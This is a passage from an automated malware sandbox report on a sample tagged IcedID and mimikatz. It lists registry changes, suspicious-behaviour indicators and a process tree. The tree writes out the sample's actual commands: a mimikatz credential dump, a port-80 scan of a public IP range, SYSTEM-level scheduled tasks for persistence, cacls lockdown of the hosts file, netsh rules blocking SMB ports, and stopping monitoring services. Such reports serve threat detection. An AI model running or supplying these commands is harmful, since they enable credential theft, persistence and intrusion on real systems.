opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zluvegc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language yqvyfiien.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 976 cmd.exe 4480 PING.EXE 560 MicrosoftEdgeUpdate.exe -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0008000000023e41-5.dat nsis_installer_2 behavioral2/files/0x0007000000023e46-13.dat nsis_installer_1 behavioral2/files/0x0007000000023e46-13.dat nsis_installer_2 -
Modifies data under HKEY_USERS 41 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump qitenlbei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump qitenlbei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" qitenlbei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump qitenlbei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing zluvegc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" zluvegc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" qitenlbei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" qitenlbei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump qitenlbei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" qitenlbei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump qitenlbei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" qitenlbei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" qitenlbei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" zluvegc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" qitenlbei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" qitenlbei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump qitenlbei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" qitenlbei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals qitenlbei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump qitenlbei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" qitenlbei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" qitenlbei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" zluvegc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" qitenlbei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump qitenlbei.exe Key created \REGISTRY\USER\.DEFAULT\Software qitenlbei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump qitenlbei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump qitenlbei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump qitenlbei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" qitenlbei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing qitenlbei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump qitenlbei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump qitenlbei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" zluvegc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" qitenlbei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump qitenlbei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ zluvegc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" qitenlbei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" qitenlbei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump qitenlbei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump qitenlbei.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" zluvegc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ zluvegc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ zluvegc.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4480 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2376 schtasks.exe 4772 schtasks.exe 560 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2072 2025-02-14_91d483af28933f21bd2d40990c33852a_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 2072 2025-02-14_91d483af28933f21bd2d40990c33852a_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 876 zluvegc.exe Token: SeDebugPrivilege 3668 zluvegc.exe Token: SeDebugPrivilege 3676 vfshost.exe Token: SeDebugPrivilege 1888 qitenlbei.exe Token: SeLockMemoryPrivilege 2072 dgkdfz.exe Token: SeLockMemoryPrivilege 2072 dgkdfz.exe Token: SeDebugPrivilege 4840 qitenlbei.exe Token: SeDebugPrivilege 4232 qitenlbei.exe Token: SeDebugPrivilege 4140 qitenlbei.exe Token: SeDebugPrivilege 4916 qitenlbei.exe Token: SeDebugPrivilege 3888 qitenlbei.exe Token: SeDebugPrivilege 2664 qitenlbei.exe Token: SeDebugPrivilege 3836 qitenlbei.exe Token: SeDebugPrivilege 2308 qitenlbei.exe Token: SeDebugPrivilege 760 qitenlbei.exe Token: SeDebugPrivilege 4112 qitenlbei.exe Token: SeDebugPrivilege 3928 qitenlbei.exe Token: SeDebugPrivilege 4232 qitenlbei.exe Token: SeDebugPrivilege 5076 qitenlbei.exe Token: SeDebugPrivilege 4608 qitenlbei.exe Token: SeDebugPrivilege 3492 qitenlbei.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2072 2025-02-14_91d483af28933f21bd2d40990c33852a_hacktools_icedid_mimikatz.exe 2072 2025-02-14_91d483af28933f21bd2d40990c33852a_hacktools_icedid_mimikatz.exe 876 zluvegc.exe 876 zluvegc.exe 3668 zluvegc.exe 3668 zluvegc.exe 4024 xohudmc.exe 4200 wooakm.exe 3524 zluvegc.exe 3524 zluvegc.exe 4232 zluvegc.exe 4232 zluvegc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2072 wrote to memory of 976 2072 2025-02-14_91d483af28933f21bd2d40990c33852a_hacktools_icedid_mimikatz.exe 86 PID 2072 wrote to memory of 976 2072 2025-02-14_91d483af28933f21bd2d40990c33852a_hacktools_icedid_mimikatz.exe 86 PID 2072 wrote to memory of 976 2072 2025-02-14_91d483af28933f21bd2d40990c33852a_hacktools_icedid_mimikatz.exe 86 PID 976 wrote to memory of 4480 976 cmd.exe 88 PID 976 wrote to memory of 4480 976 cmd.exe 88 PID 976 wrote to memory of 4480 976 cmd.exe 88 PID 976 wrote to memory of 876 976 cmd.exe 92 PID 976 wrote to memory of 876 976 cmd.exe 92 PID 976 wrote to memory of 876 976 cmd.exe 92 PID 3668 wrote to memory of 3100 3668 zluvegc.exe 94 PID 3668 wrote to memory of 3100 3668 zluvegc.exe 94 PID 3668 wrote to memory of 3100 3668 zluvegc.exe 94 PID 3100 wrote to memory of 4848 3100 cmd.exe 96 PID 3100 wrote to memory of 4848 3100 cmd.exe 96 PID 3100 wrote to memory of 4848 3100 cmd.exe 96 PID 3100 wrote to memory of 3252 3100 cmd.exe 97 PID 3100 wrote to memory of 3252 3100 cmd.exe 97 PID 3100 wrote to memory of 3252 3100 cmd.exe 97 PID 3100 wrote to memory of 4188 3100 cmd.exe 98 PID 3100 wrote to memory of 4188 3100 cmd.exe 98 PID 3100 wrote to memory of 4188 3100 cmd.exe 98 PID 3100 wrote to memory of 4912 3100 cmd.exe 99 PID 3100 wrote to memory of 4912 3100 cmd.exe 99 PID 3100 wrote to memory of 4912 3100 cmd.exe 99 PID 3100 wrote to memory of 3012 3100 cmd.exe 100 PID 3100 wrote to memory of 3012 3100 cmd.exe 100 PID 3100 wrote to memory of 3012 3100 cmd.exe 100 PID 3100 wrote to memory of 4004 3100 cmd.exe 101 PID 3100 wrote to memory of 4004 3100 cmd.exe 101 PID 3100 wrote to memory of 4004 3100 cmd.exe 101 PID 3668 wrote to memory of 4404 3668 zluvegc.exe 102 PID 3668 wrote to memory of 4404 3668 zluvegc.exe 102 PID 3668 wrote to memory of 4404 3668 zluvegc.exe 102 PID 3668 wrote to memory of 2300 3668 zluvegc.exe 104 PID 3668 wrote to memory of 2300 3668 zluvegc.exe 104 PID 3668 wrote to memory of 2300 3668 zluvegc.exe 104 PID 3668 wrote to memory of 3880 3668 zluvegc.exe 106 PID 3668 wrote to memory of 3880 3668 zluvegc.exe 106 PID 3668 wrote to memory of 3880 3668 zluvegc.exe 106 PID 3668 wrote to memory of 3220 3668 zluvegc.exe 111 PID 3668 wrote to memory of 3220 3668 zluvegc.exe 111 PID 3668 wrote to memory of 3220 3668 zluvegc.exe 111 PID 3220 wrote to memory of 2320 3220 cmd.exe 113 PID 3220 wrote to memory of 2320 3220 cmd.exe 113 PID 3220 wrote to memory of 2320 3220 cmd.exe 113 PID 2320 wrote to memory of 760 2320 wpcap.exe 114 PID 2320 wrote to memory of 760 2320 wpcap.exe 114 PID 2320 wrote to memory of 760 2320 wpcap.exe 114 PID 760 wrote to memory of 3912 760 net.exe 116 PID 760 wrote to memory of 3912 760 net.exe 116 PID 760 wrote to memory of 3912 760 net.exe 116 PID 2320 wrote to memory of 540 2320 wpcap.exe 117 PID 2320 wrote to memory of 540 2320 wpcap.exe 117 PID 2320 wrote to memory of 540 2320 wpcap.exe 117 PID 540 wrote to memory of 4976 540 net.exe 119 PID 540 wrote to memory of 4976 540 net.exe 119 PID 540 wrote to memory of 4976 540 net.exe 119 PID 2320 wrote to memory of 2724 2320 wpcap.exe 120 PID 2320 wrote to memory of 2724 2320 wpcap.exe 120 PID 2320 wrote to memory of 2724 2320 wpcap.exe 120 PID 2724 wrote to memory of 3444 2724 net.exe 122 PID 2724 wrote to memory of 3444 2724 net.exe 122 PID 2724 wrote to memory of 3444 2724 net.exe 122 PID 2320 wrote to memory of 3532 2320 wpcap.exe 123
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2144
-
C:\Windows\TEMP\ewshgkeiu\dgkdfz.exe"C:\Windows\TEMP\ewshgkeiu\dgkdfz.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
-
C:\Users\Admin\AppData\Local\Temp\2025-02-14_91d483af28933f21bd2d40990c33852a_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2025-02-14_91d483af28933f21bd2d40990c33852a_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\yibeuvqk\zluvegc.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4480
-
-
C:\Windows\yibeuvqk\zluvegc.exeC:\Windows\yibeuvqk\zluvegc.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:876
-
-
-
C:\Windows\yibeuvqk\zluvegc.exeC:\Windows\yibeuvqk\zluvegc.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4848
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:3252
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4188
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:4912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3012
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:4004
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4404
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2300
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3880
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\beabtyubr\ihivhqini\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3220 -
C:\Windows\beabtyubr\ihivhqini\wpcap.exeC:\Windows\beabtyubr\ihivhqini\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:3912
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4976
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:3444
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:3532 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:3160
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4476 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2700 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3080
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4580
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4844
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:1596
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\beabtyubr\ihivhqini\tuykeyttq.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\beabtyubr\ihivhqini\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:1352 -
C:\Windows\beabtyubr\ihivhqini\tuykeyttq.exeC:\Windows\beabtyubr\ihivhqini\tuykeyttq.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\beabtyubr\ihivhqini\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4016
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\beabtyubr\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\beabtyubr\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:940 -
C:\Windows\beabtyubr\Corporate\vfshost.exeC:\Windows\beabtyubr\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3676
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "hcbjetyqy" /ru system /tr "cmd /c C:\Windows\ime\zluvegc.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4528 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2992
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "hcbjetyqy" /ru system /tr "cmd /c C:\Windows\ime\zluvegc.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2376
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ejpbyuvni" /ru system /tr "cmd /c echo Y|cacls C:\Windows\yibeuvqk\zluvegc.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:4864 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4608
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ejpbyuvni" /ru system /tr "cmd /c echo Y|cacls C:\Windows\yibeuvqk\zluvegc.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4772
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "blwskbnjy" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ewshgkeiu\dgkdfz.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:3316 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:816
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "blwskbnjy" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ewshgkeiu\dgkdfz.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:560
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:836
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:232
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:760
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1888
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4532
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4820
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1100
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3864
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1596
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
